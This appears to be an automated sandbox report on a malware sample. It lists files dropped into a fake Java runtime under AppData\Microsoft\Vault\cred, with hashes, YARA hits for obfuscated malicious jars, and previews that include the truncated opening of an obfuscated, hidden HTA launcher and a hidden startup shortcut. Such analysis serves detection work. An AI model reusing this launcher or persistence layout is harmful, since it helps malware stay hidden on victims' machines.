Entropy (8bit):	5.14936903006307
Encrypted:	false
SSDEEP:	96:zMWCQv8u9/IzdG/JvFWlHaQzWy/owZFomWdYQCfQ/ydQCyJ:gWCQv7VIxG/JodaQ7PoHWQaQ/6QCY
MD5:	880BAACB176553DEAB39EDBE4B74380D
SHA1:	37A57AAD121C14C25E149206179728FA62203BF0
SHA-256:	FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
SHA-512:	3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F.error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4.error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4.error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557.error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557.error.recv.failed=Splash: recv \u5931\u6557.error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9.error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E.error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E.error.splash.exit=Java Web Start \u9583\u73FE\u87A2\u5E55\u8655\u7

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\recovery.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	16946302
Entropy (8bit):	7.990735964632163
Encrypted:	true
SSDEEP:	393216:OGxPV0krVjQk1Ifqj96ebGoB5TyKKeNJvrFUFS3/xw4wMMLcW:OG9VzxMJis6GoxxFx/a4wzj
MD5:	831E8918AF6C74E528CAABDCBEF4884D
SHA1:	29098E04115CD65AEA6CDEFDE5EE699A7C9C07D5
SHA-256:	32491545D735420C70D69BF75D66545B4388FE683281B949321E4384B555C510
SHA-512:	E7CB3B055A907430F83BB34C030D66BB48CD6DBBA3AC94AD680A2D027ACCDBB33D8D4D2BAC8B931C65A31078A80AC15ECFEF6EEA55C0BD8B4A64BA2196293DAC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\recovery.jar, Author: Joe Security
Preview:	PK........Jz"Z............'...org/sqlite/native/Linux-Android/x86_64/UT...<.vg....PK........Iz"Z............>...org/apache/commons/codec/language/bm/gen_approx_greeklatin.txtUT...:.vgeR.n.@....#zI".T=.'..j.%C....a.Qa....~...n.....3..L....<S..a..o..^...L.Ge..f..d4.........F0.:cQP..........A...C... C...C.<...$771.H.. ....P1.K.j..i..f!.keK.5..WKu.....k...L.N..M..q'V.y2.bc.x.b...#,.....Nj..ox.....+h.ap...K..g....[R........i.1g..^MN.T.2P...wz.../Q4..VM......a......,[.^t..qZ........gY.:..V.2.iJ..Y.h9n]o.-.......v...........$Y...,.6...../9...c..........S.'..O{....H.. g.<x.8`.$yb9...K7..)rv=.TQ..t=...6..jY..mGN..X`)0-u.r....(.>...d$....5..... ........PK.........M...PK........Iz"Z............8...org/apache/commons/codec/language/bm/gen_rules_dutch.txtUT...:.vgmS...6...+.<....zlOJ...5.f.da,Z..h.^.THje...\|CO..uF.)..!.z...fF.w......"......g...k.....s'..I.>L..0...m. .L+g.q..zF....(..3.T..~..$......\...Vo.+...B........0p..Qp.KU`..ldQ:..........W-....n.....w..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	143544
Entropy (8bit):	4.506961238527131
Encrypted:	false
SSDEEP:	384:mGPYo75nIhnBvNqS0pb/CwS+9PIWbbV0T:myavsSMb/CwSGVyT
MD5:	BA37BE5FED794BDFF5A18305A2475B36
SHA1:	D8C81316DBEB0E7623369D59294B168BF1B7A8CF
SHA-256:	092A56BAEA54250A191170FA0494B3807D40F7EC747F2E0A833B9B0949D4248A
SHA-512:	768E50CC1BEBCA958EAEDBC9089760BB61F5EE3ECC879C698CDC2A0DA020DDF6E4B163D723DEA81F1AA9D804075FF2791CC070556185A5317951268BB26A84FD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar, Author: Joe Security
Preview:	PK.........Z.Y................META-INF/MANIFEST.MFUT.....Vg.....M..LK-...K-...R0.3..M...u.I,..RHI.I...K...u..K2......PK...c..8...:...PK...........Y................./..class/;.o.>.....VF.....ww.3022......eg`fbd`b`a...PK..>h..+.../...PK.........Y.Y................./..class/UT.....Vg.VmLSW.~No..K...0....9..&.P.s .N@.8.\.-.E..)"3....~,[.K.6...Q.c.f2.-..e..%&._[.,v.h..c.{.9...........8....."...n......5v...F%.#B`.....-5..W..y.m./R. ....cXC$... .T..w.."...;w7Cf........{f..{.......S.....`e.?N$"....Vt*....2.w.THX...6......g H..z.{..5v...J._...!.C.4D._OcH..+.-..y.....H...VX.....OQ..\..V.t...^bOu.....,.. ..(J.J..".jQ......[9...3HDX.W.a.'...K..6.LX. ?..D..5$b...)..J..4.B...Yy..%..l.&l...x....T.....n.pk....G.^.%T..>.e.XP........-...%.c..f+A]d\( ...`..D....5.H<.O.....Qe..>..w.3...5A^....!.....\|....4.8.c..ux..8?.sc..).)u...G.G.9W.,.[..FnF3y.R!.....<p......D.3J.b>'.....".....%.-.H.U...Ih.j.....$..R.[.......U...w....OJJ].o./....O...c..m..>.. ..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\splash.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 320 x 139
Category:	dropped
Size (bytes):	8590
Entropy (8bit):	7.910688771816331
Encrypted:	false
SSDEEP:	192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
MD5:	249053609EAF5B17DDD42149FC24C469
SHA1:	20E7AEC75F6D036D504277542E507EB7DC24AAE8
SHA-256:	113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
SHA-512:	9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
Malicious:	false
Preview:	GIF89a@................................................FFF...T..W..V..Is.Kv.W..W..U..Hr.P\|.O{.Mx.Gq.Jt.Fo.Fp.V..U..Gp.T..Lw.P\|.R..Q~.S..S..Nz.Lw.Hq.Ju.X..V..Lx.It.U..Hs.Ny.Nz.P}.R~.S..R~.R..Q}.Q}.My.Lv.It.O{.Ku.My.Oz.Gp.Gq.Hr.....................WWW.........Ry.uuu............i......ggg...]..................{..y..d..........Sz................s............i...............c............v.....X........r...........]........^........p.....z.........r..Y..l..m...............]................Mu........Qw.Nw.........v.....b..j.......V}.]........d.....k........v........Lu....S\|.U{.Oy................W........Lv.U..R}.....Nv.Gp.Nx.Ks....Jr....Hq......V~.T..S~.Z.....Gq.O{.......W..Qz.......Lw.Z.....T...........S~....Lt.Kv....V.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\splash@2x.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 640 x 278
Category:	dropped
Size (bytes):	15276
Entropy (8bit):	7.949850025334252
Encrypted:	false
SSDEEP:	192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
MD5:	CB81FED291361D1DD745202659857B1B
SHA1:	0AE4A5BDA2A6D628FAC51462390B503C99509FDC
SHA-256:	9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
SHA-512:	4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
Malicious:	false
Preview:	GIF89a..............................................FFF...W..V..Is.Hr.W..W..U..P\|.T..Kv.O{.V..Mx....S..Fp.Jt.Lw.Gp.Gq.Lw.U..T..R..Q~.Fo.Nz.R~.R..Q}.My.Ju.It.Oz.Gp.Nz.Gq.V..Ny.Hq.P\|.P}.S..S..S..Q}.Ku.Ku.Hr.Lx.X..Mx.It.U..Is.Hs.T..O{.R~.T..O{.Kv.My.Lv..........i...........]..WWWu...........ggguuut.......................................Ry.......{..............b..........................^..l.................X}....a..{.....c..................v..m........T{.f.....l........X.........................j..U\|...........`........j..g..U~........^.....Qz.Jr.Nw.p.....v.....p.....Gp....r..Mt.......y..q.....]..Nv............Tz.Y.....[.....Pw....Ox..............X.....Y..X..W..V..S\|............Mx....Mv.Kt.U..Hq.Lv.W.....Mu.i..Q{.Gq.Lt.S~.T..U..Kv................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\splash_11-lic.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 320 x 139
Category:	dropped
Size (bytes):	7805
Entropy (8bit):	7.877495465139721
Encrypted:	false
SSDEEP:	96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
MD5:	9E8F541E6CEBA93C12D272840CC555F8
SHA1:	8DEF364E07F40142822DF84B5BB4F50846CB5E4E
SHA-256:	C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
SHA-512:	2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
Malicious:	false
Preview:	GIF89a@...................................{...........c.....P\|.l.....].............Ry.........S{.i.....U~........................uuuV..b........T.....WWW}..R~.......Hr.v..T\|.It..........n.............e..f.....].........Hq.`........Y.....i..r.._..l...........]..Y.....v..................s..f.....z.....\........Jr.r.....................i..e.....p.....Y..m........Z..Sz.Ow....Y..Nx.{..w..Jr.T..R}....Pw.Lt.s..`..W..W..Lv...........................................FFF...W..V..Is.Kv.W..W..U..Hr.O{.Mx.Jt.Gq.Fp.Gp.Lw.Fo.U..T..Q~.R..P\|.Lw.S..S..Ju.Nz.V..X..V..U..Ny.Hs.My.Ku.My.Q}.R~.P}.Q}.R..S..S..O{.Oz.Lx.Nz.Lv.It.Gp.Gq....ggg.....................S...............S\|....Gp........Mw.S~.Px.Nz.Pz.......Lt.Kv.a.....V.....r.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\splash_11@2x-lic.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 640 x 278
Category:	dropped
Size (bytes):	12250
Entropy (8bit):	7.901446927123525
Encrypted:	false
SSDEEP:	192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
MD5:	3FE2013854A5BDAA488A6D7208D5DDD3
SHA1:	D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
SHA-256:	FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
SHA-512:	E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
Malicious:	false
Preview:	GIF89a.......{.....k......{...........P\|.b..V......................Hr.Hq.......................]...........X...........f.............i............R~....u..It.u.....l..T~.......Qz.......^..Q~....i.......b.............Qx.Y..Y.....q..p.....v..............a..U\|......T..Y........................^..n........f.....Tz.e..j..f..Ox.p..Y~.Ov.......y..Z..h.....l.....W.....w.....R\|.p.....X~.a........Pw.Ks.Ir.......^.....Kt.FFF\........Ox...........W..U..Nw.Mu.W..V..Is.V..Hr.R~.W..W..U..T..O{.Kv.Gp.S..Mx.Lw.Fp.Lw.U..T..Jt.R..Gq.Fo.Ju.My.R..Q}.R~.Nz.Oz.It.Nz.V..V..Gp.Ny.Ku.P\|.Ku.Gq.P}.S..Q}.S..S..Is.Lx.U..O{.Hs.T..O{.My.Mx.Kv.Lv............iii...YYY.............xxx........._.....U..Gp.U..Lv.Mw....Oz......S\|.S}.Hq.\..Kv....Mv.P{.W..T........Mw.T.....Nz.q..Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\start.hta

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	HTML document, ASCII text, with very long lines (2540), with CRLF line terminators
Category:	dropped
Size (bytes):	9877
Entropy (8bit):	5.297852423343185
Encrypted:	false
SSDEEP:	192:uf/ucDXw8pcU7fcdY+eqN9292B2Ve28kGpiqfOssWkhbVVCyUweOm0x:uf/ucDBpc82Ym/292B2c28kGpzOjWkhP
MD5:	2632D4A005A4284B64CE56C35CD3DF5C
SHA1:	19D522E9F8516D032F53BFA62881F8E28B2E1A58
SHA-256:	2432584CD8BA5284FE551463DFDA9744A5969F6AFEAA7A841B1D289AA46AE2FC
SHA-512:	522DAF2B7843AFE00CD0DFCAF295263F25857010DDF7C939DE35CE4F1DAF7DE64172BCDBB239A9E094BA1735984D1CD563649D8F02D768C0C00650142601BA92
Malicious:	false
Preview:	<html>..<head>.. <title>Launch</title>.. <HTA:APPLICATION.. ID="Launcher".. APPLICATIONNAME="Launch".. SINGLEINSTANCE="yes".. WINDOWSTATE="minimize".. SHOWINTASKBAR="no".. SYSMENU="no".. BORDER="none".. INNERBORDER="no".. SCROLL="no".. SELECTION="no".. CONTEXTMENU="no".. />.. <script language="javascript">.. var _0xcc93,onLoad,_0x3665;..(function()..{...function l(a,b)...{....return a< b...}...function u()...{....return ActiveXObject...}...function q()...{....return d...}...function r()...{....return e...}...function w()...{....return window...}...function m(a,b)...{....return a== b...}...function n(a,b)...{....return a=== b...}...function k(a,b)...{....return a/ b...}...function v()...{....return parseInt...}...function p()...{....return c...}...function y(a)...{....return -a...}...function h(a,b)...{....return a* b...}...function i(a,b)...{....return a+ b...}...function j(a,b)...{....retur

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\startup.lnk

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=0, Archive, ctime=Fri Jan 3 11:12:38 2025, mtime=Fri Jan 3 11:12:38 2025, atime=Thu Jan 2 23:46:04 2025, length=4710, window=hide
Category:	dropped
Size (bytes):	2829
Entropy (8bit):	2.9847405453156957
Encrypted:	false
SSDEEP:	24:8qXPZnKxDRbREOhA3nuNNiFoiK8wDbiadu4iB/RBAg/:8qXPmDcOy3nuXimiK8wniSu4iJ3l/
MD5:	4ECC66E64D22ACEA5F5D9F249DD51F23
SHA1:	668E15DE8719A1118EB88443065B8CA1C9388CAD
SHA-256:	97008F69F6F94CF1BB3BABE99EF76F73BCEACF27E01EC6A5A738021AD8D4FCC6
SHA-512:	62A72A0C89B31F5EE8A1DAF1C1B7B76AA268C66A76E2FBE5B5B5FB0E4ED232A819E05B6E891985C22FFC67AC40EF1E4D6EE8F78D2B9E2B959295A1C54650E522
Malicious:	false
Preview:	L..................F.B.. ....)...]...P...]...l.x]..f....................... .:..DG..Yr?.D..U..k0.&...&......95..O...`.P[.\..._y.]......t...CFSF..1......V;w..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......V:w#Z.]...........................p..A.p.p.D.a.t.a...B.V.1....."Z.z..Roaming.@......V:w#ZM\..........................D.%.R.o.a.m.i.n.g.....\.1....."Z.z..MICROS~1..D......V:w#ZX\..............................M.i.c.r.o.s.o.f.t.....T.1.....#Z.a..UProof..>......Y4B#Z.a....$.....................`B'.U.P.r.o.o.f.....\.2.f...#Z.. .start.hta.D......#Z.a#Z.a....%.....................=4..s.t.a.r.t...h.t.a.......p...............-.......o....................C:\Users\Administrator\AppData\Roaming\Microsoft\UProof\start.hta..0.....\.....\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.U.P.r.o.o.f.\.s.t.a.r.t...h.t.a.S.C.:.\.U.s.e.r.s.\.u.s.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.m.i.c.r.o.s.o.f.t.\.v.a.l.t.\.c.r.e.d.s.\.j.r.e.\.j.r.e.-.1...8.\.l.i.b.\.d.e.p.l.o.y.\.s.t.a.r.t...h.t.a.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\access-bridge-32.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	197117
Entropy (8bit):	7.7928884074285
Encrypted:	false
SSDEEP:	3072:o9Vm9Bs7qOJH/kAzav9F8zxFqGv+dzOmogLKF/z8Q34fwo/LSYI6hMEmJtzPMU:3K/cL41v+NOmRLKrF4f726hMXZV
MD5:	568C3E667A643B29CD632D555A8D5CE5
SHA1:	A452BFCB8F6A585696CD8D6D735DF6DC9F488B02
SHA-256:	D6AE7647986EC9D8A1068F9DF2F3AA4B3A1D27F2BE3A2FDF0F1E28CF2E12021E
SHA-512:	66988E124C9C3CDEA4694D7B8AAD8304995F4AD89FE5EC80645469D9F9A936588253469F8DBC33B2C0F0972AF099C1BE2A5191CAB1C609F882695B7AC866CDFA
Malicious:	false
Preview:	PK........JB>Y................META-INF/......PK..............PK........JB>Y................META-INF/MANIFEST.MF.M..LK-...K-...R0.3..r.JM,IM.u........Y.h..%&.8.....%...k.r.r..PK......D...E...PK.........A>Y............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z. ......".e........MG.\|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..\|..z_.q.....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&\|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK.........A>Y............0...com/sun/java/accessibility/AccessBridge$10.class.T[O.[....e`.. .7.j.v.. zT.Rh...c..a.SF..2........o..&.^..}.7...m....I....\|.~....(nu.....$9....L...i.......3.:0....#.9I.k..F.c.U.U\bH,Ynz

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\cldrdata.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	3861927
Entropy (8bit):	7.96679916700072
Encrypted:	false
SSDEEP:	98304:M6XtU5qX0dwZYG4YpIbAnwkvJMNVVdEVT+oh5ilCVUMGhsAs:M6Xi9wGSmAnwqafOf6AOlhJs
MD5:	1BC83ACDC1EAA6CB44F63801BCD72A5A
SHA1:	FD9ECB8EAAAE57A2038015BE269CEE0E44471B32
SHA-256:	6C1F0062711DB02ED39A3BBF93A8C4E905BF4E0E35FA9FC3D752A4A186AF7359
SHA-512:	928267C3EC67F73C2A78A9D9BCCD36225169A65A63D2C2816725523B52B90E35E4230FB8DB8614335A6DBB14D441CF60413E5744AFB36B8115E16F6D05FCB668
Malicious:	false
Preview:	PK........HB>Y................META-INF/......PK..............PK........HB>Y................META-INF/MANIFEST.MF.M..LK-...K-...R0.3..r.q.B........E..%.).N. e.z..F.....E..9....E..E.%@-..\.\.PK....kYO...[...PK.........A>Y................sun/text/resources/cldr/aa/FormatData_aa.classmPMO.@.}........(.@..xB....!b,1i8..6X..I.5._.'.....(..".9.yy3.f?..?..`?...6T.5l....aG......=...mqN.......t...:6g.;`^....d.L..\0.\|.b...w&.....c.;...8%H...........RqA.......b. ..p./G......B0..K.Sx6...>4\....Zy.!..".R.N....T....=..c~d.7...3(5.<.....a;F....\....a8@..a.@..d^.]YV"k....U...2'#...rX.K...ue...O....bZ.:CB...jZ.]3...2M.s....3}.ct%.GV..PK...]..d.......PK.........A>Y................sun/text/resources/cldr/af/FormatData_af.classuV.x[W.>...a[y......R.+-..K].I.4..(...b.=....a.h...({..B!...{.U......w../...y...?.;w>.u..w..A.......xE.nFxe.nAx...^.p+.k.^..z.7 ...M.oFx..[...v.3..!.....Bx7.{.nGx/....@x?...."..A..!\|....G.>..1..#\|....B......A.,...>..../"\|...._A.*........o"\|.....A..........."

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\dnsns.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	8488
Entropy (8bit):	7.786336606023723
Encrypted:	false
SSDEEP:	192:nTUXHri3DH/pj55oNQYnrKcwP1CCzJ/bRFs:nT4Her/pj55IecoU
MD5:	DE67B03890679F16396978AFC3363670
SHA1:	F6E73C7B4B0F29E00D7121CEDB18FA28D87D1472
SHA-256:	6340833998E641E1E9039F566E08C74EC8B01EFA6C533C3E94A255AB182FEB6D
SHA-512:	118049D5605066B1FFC6A2BC93C7D4C490AF0B8D004082A4ABC567B96C494B3B0ADC68C219D42B38289EDCC7EF0EE29C72C5817070B32D1145F9D57305659E61
Malicious:	false
Preview:	PK........HB>Y................META-INF/......PK..............PK........HB>Y................META-INF/MANIFEST.MF.M..LK-...K-...R0.3..r.JM,IM.u........Y.h..%&.8.....%...k.r.r..PK......D...E...PK.........A>Y............2...sun/net/spi/nameservice/dns/DNSNameService$1.class.S]O.A.=......./@."e.,(>AH.` )..g.......l.O...7.+0.5>.}.7.....U.k..{f.=g.....'.K.....q..C7n.P...;9B.-.-8.J.V......#....nd..n.p..=_,3t.}....f.a.\%..6......nJO.5....j......V..f.a..?..].<f..5.._.JT..=.w.5.....Tq&....R....3.>v7.^...G.l.V.....F.0..<.D..@......K.>.:......y....+n"M.O..s....4..#-...uQk..yq\...y.U.H{..9......cSy~.R..a........l...%.}X.p..=,1L.S.. .h.....`o+%....P...?..0.awh.m..m1....$..._...N...uav.a#.\..t....M.......p..B3..y....~.:W..>./:.2n.....gH......4I.....C?...i....wJ.`..)R.{...DN(vQ..Q.i..Eo)..[.> S.}A.5......ZI%.Ad(>'+/H.%a.0L.Y....#....U.._..W.....f.w.:...O.U......K.8&.....z.......PK..*...u.......PK.........A>Y............2...sun/net/spi/nameservice/dns/DNSNameService$2.class

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\jaccess.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	44517
Entropy (8bit):	7.904665504830616
Encrypted:	false
SSDEEP:	768:vYVrdSqfgKbWnXuZTQvfBPJrWEhtkZQnWn109mqFdjE4T:vKrdSWgfnXuQfBIEUQnWn10AqD3T
MD5:	F4D90F1D505F943EA4A2F3E0CCF71643
SHA1:	EB9593E69688A4D1C435B87DCF82E9F6C0D80434
SHA-256:	962AE51FC3B3571EEBFF644F9B4E8B89E8DD07992BB70FCFF8EAE130DDE7E8D4
SHA-512:	51D236FB6E333770400765173E123E2B1AA76180994EE1203E31D148A2FC360E3D61A4227A78E3E67289F0B93DA62E6DEAE2ADFE6B7958966D31C9ACCA7FE117
Malicious:	false
Preview:	PK........JB>Y................META-INF/......PK..............PK........JB>Y................META-INF/MANIFEST.MF.M..LK-...K-...R0.3..r.JM,IM.u........Y.h..%&.8.....%...k.r.r..PK......D...E...PK.........A>Y............Z...com/sun/java/accessibility/util/AccessibilityEventMonitor$AccessibilityEventListener.class.Wkp.........5..5..A6`l..C\j.A...eb)..)dm....J+..h...I.&&...L.4.3.$.aH.q.....M...i..m......KNf4.y..~.9g.>.....[p.:....n..p....(........#.D'".ta/.>.D7.\|.s.!..f.o......#\w?o...;q..]x....B...~.....t..4>?.#N.1$Aw........;..#j.HJ0%..p...M.5...V[.. .........P...).qZ)......a-i...H2.EM..H.2l.H.eX_.>..(..J_..Lj.Z\3G...,...C\|.....T..$,.q.OX...[.u..Qg..6..:...iz.q.-....:sD@9j.2[..w..I3a.r....cXM..m..}P..J.WU.d`o.nhD.3.=).)..o2..F...8^k...f)t.........G...e\|.....C*K."#.F...,.m.q..I8)....$..x^......e..?..c.D..8..e..7...U..8..dl...rc.s.7d..3...x.....E`.....n/.8.qY......i.~BQ..\.1.K2~.K...s.C.YN...@.Lh...i....PwwW.W...2.z....<%..F..+..xW.e...K.W0...3......J..)S

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\jfxrt.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	18233288
Entropy (8bit):	5.971316003205684
Encrypted:	false
SSDEEP:	49152:W5MZ4Qu6mw6u/WLPucSul3+4ubKyQ8fIdMF2pyIA2aT0JiLe0RKCXGHkVmECxf1n:WlImgyHSuRubKyk6G5gyEgArzzwk14
MD5:	402DE388F407FDAF8687F8C4ECDDF722
SHA1:	63E404C69DC9BE45E1114FB3BCB8CC62E4F324E5
SHA-256:	CFEE305EC4B103038E367FA334B50945A1AC78B277899DAF925230B4C3ADE497
SHA-512:	3F0117C0185F18584BDCEF156EA4E107AB11FFC2E49D1A2A104586ADEA8ED085F225250BFE6CBE37A1FCA7EBAE4145AB52AAFCE49AAEB771F3A6089DD1827D3B
Malicious:	false
Preview:	PK..........>Y................META-INF/....PK..........>Y....i...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.5..Created-By: 1.8.0_381-b09 (Oracle Corporation)....PK..........>Y................com/PK..........>Y................com/sun/PK..........>Y................com/sun/deploy/PK..........>Y................com/sun/deploy/uitoolkit/PK..........>Y................com/sun/deploy/uitoolkit/impl/PK..........>Y............!...com/sun/deploy/uitoolkit/impl/fx/PK..........>Y............$...com/sun/deploy/uitoolkit/impl/fx/ui/PK..........>Y................com/sun/deploy/uitoolkit/impl/fx/ui/resources/PK..........>Y............4...com/sun/deploy/uitoolkit/impl/fx/ui/resources/image/PK..........>Y................com/sun/glass/PK..........>Y................com/sun/glass/events/PK..........>Y................com/sun/glass/ui/PK..........>Y................com/sun/glass/ui/delegate/PK..........>Y................com/sun/glass/ui/win/PK..........>Y................com/

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\localedata.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	2207001
Entropy (8bit):	6.724284164585235
Encrypted:	false
